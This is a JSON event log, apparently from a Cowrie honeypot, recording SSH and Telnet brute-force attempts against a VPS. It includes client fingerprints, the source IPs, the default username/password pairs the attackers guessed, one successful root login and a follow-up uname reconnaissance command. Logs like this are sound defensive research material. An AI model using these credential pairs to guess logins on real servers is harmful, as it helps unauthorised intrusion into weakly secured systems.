{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.910831Z","src_ip":"212.227.235.229","session":"fc21ff978bda"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456a?","message":"login attempt [postgres/123456a?] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:10.922960Z","src_ip":"170.64.166.123","session":"4656b15ceb92"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:12.204616Z","src_ip":"170.64.166.123","session":"4656b15ceb92"}
{"eventid":"cowrie.login.failed","username":"test","password":"root123","message":"login attempt [test/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:15.924715Z","src_ip":"212.227.235.229","session":"fc21ff978bda"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:17.322539Z","src_ip":"212.227.125.160","session":"04ee4619bf8b"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:17.716461Z","src_ip":"212.227.235.229","session":"fc21ff978bda"}
{"eventid":"cowrie.session.closed","duration":"16.5","message":"Connection lost after 16.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:20.704227Z","src_ip":"212.227.125.160","session":"04ee4619bf8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42862,"dst_ip":"1.2.3.4","dst_port":22,"session":"b56bbc43782b","protocol":"ssh","message":"New connection: 212.227.235.229:42862 (1.2.3.4:22) [session: b56bbc43782b]","sensor":"my-vps","timestamp":"2025-08-31T05:25:22.197488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:25:24.148533Z","src_ip":"212.227.235.229","session":"b56bbc43782b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:25:24.149314Z","src_ip":"212.227.235.229","session":"b56bbc43782b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46560,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6bbd9843823","protocol":"ssh","message":"New connection: 212.227.235.229:46560 (1.2.3.4:22) [session: c6bbd9843823]","sensor":"my-vps","timestamp":"2025-08-31T05:25:27.185219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:25:27.766905Z","src_ip":"212.227.235.229","session":"c6bbd9843823"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:25:27.934568Z","src_ip":"212.227.235.229","session":"c6bbd9843823"}
{"eventid":"cowrie.session.connect","src_ip":"42.6.127.96","src_port":38574,"dst_ip":"1.2.3.4","dst_port":23,"session":"c94d93bc49fc","protocol":"telnet","message":"New connection: 42.6.127.96:38574 (1.2.3.4:23) [session: c94d93bc49fc]","sensor":"my-vps","timestamp":"2025-08-31T05:25:29.360940Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32792,"dst_ip":"1.2.3.4","dst_port":22,"session":"077d42b17347","protocol":"ssh","message":"New connection: 212.227.125.160:32792 (1.2.3.4:22) [session: 077d42b17347]","sensor":"my-vps","timestamp":"2025-08-31T05:25:30.761982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:25:31.107738Z","src_ip":"212.227.125.160","session":"077d42b17347"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:25:31.108390Z","src_ip":"212.227.125.160","session":"077d42b17347"}
{"eventid":"cowrie.login.failed","username":"test","password":"root123","message":"login attempt [test/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:33.509257Z","src_ip":"212.227.125.160","session":"077d42b17347"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:35.097870Z","src_ip":"212.227.125.160","session":"077d42b17347"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:37.781704Z","src_ip":"212.227.235.229","session":"b56bbc43782b"}
{"eventid":"cowrie.login.failed","username":"hamza","password":"hamza@2024","message":"login attempt [hamza/hamza@2024] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:37.845069Z","src_ip":"212.227.235.229","session":"c6bbd9843823"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:39.263815Z","src_ip":"212.227.235.229","session":"c6bbd9843823"}
{"eventid":"cowrie.session.connect","src_ip":"42.100.59.62","src_port":43122,"dst_ip":"1.2.3.4","dst_port":23,"session":"7bf28008673b","protocol":"telnet","message":"New connection: 42.100.59.62:43122 (1.2.3.4:23) [session: 7bf28008673b]","sensor":"my-vps","timestamp":"2025-08-31T05:25:39.283833Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55750,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7b929f26886","protocol":"ssh","message":"New connection: 212.227.125.160:55750 (1.2.3.4:22) [session: b7b929f26886]","sensor":"my-vps","timestamp":"2025-08-31T05:25:41.481607Z"}
{"eventid":"cowrie.session.closed","duration":12.536839485168457,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:41.897711Z","src_ip":"42.6.127.96","session":"c94d93bc49fc"}
{"eventid":"cowrie.session.closed","duration":"21.2","message":"Connection lost after 21.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:43.415530Z","src_ip":"212.227.235.229","session":"b56bbc43782b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52088,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeef41164fa3","protocol":"ssh","message":"New connection: 212.227.235.229:52088 (1.2.3.4:22) [session: aeef41164fa3]","sensor":"my-vps","timestamp":"2025-08-31T05:25:44.334809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:25:44.335721Z","src_ip":"212.227.235.229","session":"aeef41164fa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:25:44.608671Z","src_ip":"212.227.235.229","session":"aeef41164fa3"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe12345","message":"login attempt [frappe/frappe12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:45.742774Z","src_ip":"212.227.235.229","session":"aeef41164fa3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:25:46.054808Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:25:46.055469Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:47.018764Z","src_ip":"212.227.235.229","session":"aeef41164fa3"}
{"eventid":"cowrie.session.closed","duration":12.821510076522827,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:52.105255Z","src_ip":"42.100.59.62","session":"7bf28008673b"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:25:57.964918Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35036,"dst_ip":"1.2.3.4","dst_port":22,"session":"c383fffb3369","protocol":"ssh","message":"New connection: 212.227.235.229:35036 (1.2.3.4:22) [session: c383fffb3369]","sensor":"my-vps","timestamp":"2025-08-31T05:26:03.902981Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:26:05.160473Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:26:05.161196Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49884,"dst_ip":"1.2.3.4","dst_port":22,"session":"de8e48fd5781","protocol":"ssh","message":"New connection: 212.227.235.229:49884 (1.2.3.4:22) [session: de8e48fd5781]","sensor":"my-vps","timestamp":"2025-08-31T05:26:07.756649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:26:08.487069Z","src_ip":"212.227.235.229","session":"de8e48fd5781"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:26:08.488246Z","src_ip":"212.227.235.229","session":"de8e48fd5781"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:26:10.718165Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:26:10.719010Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:11.831524Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.session.closed","duration":"30.4","message":"Connection lost after 30.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:11.843738Z","src_ip":"212.227.125.160","session":"b7b929f26886"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51608,"dst_ip":"1.2.3.4","dst_port":22,"session":"42cdd1a96c8e","protocol":"ssh","message":"New connection: 212.227.235.229:51608 (1.2.3.4:22) [session: 42cdd1a96c8e]","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.231865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.235485Z","src_ip":"212.227.235.229","session":"42cdd1a96c8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50306,"dst_ip":"1.2.3.4","dst_port":22,"session":"24e89a429dbd","protocol":"ssh","message":"New connection: 212.227.235.229:50306 (1.2.3.4:22) [session: 24e89a429dbd]","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.399220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.400280Z","src_ip":"212.227.235.229","session":"24e89a429dbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.480327Z","src_ip":"212.227.235.229","session":"24e89a429dbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.488335Z","src_ip":"212.227.235.229","session":"42cdd1a96c8e"}
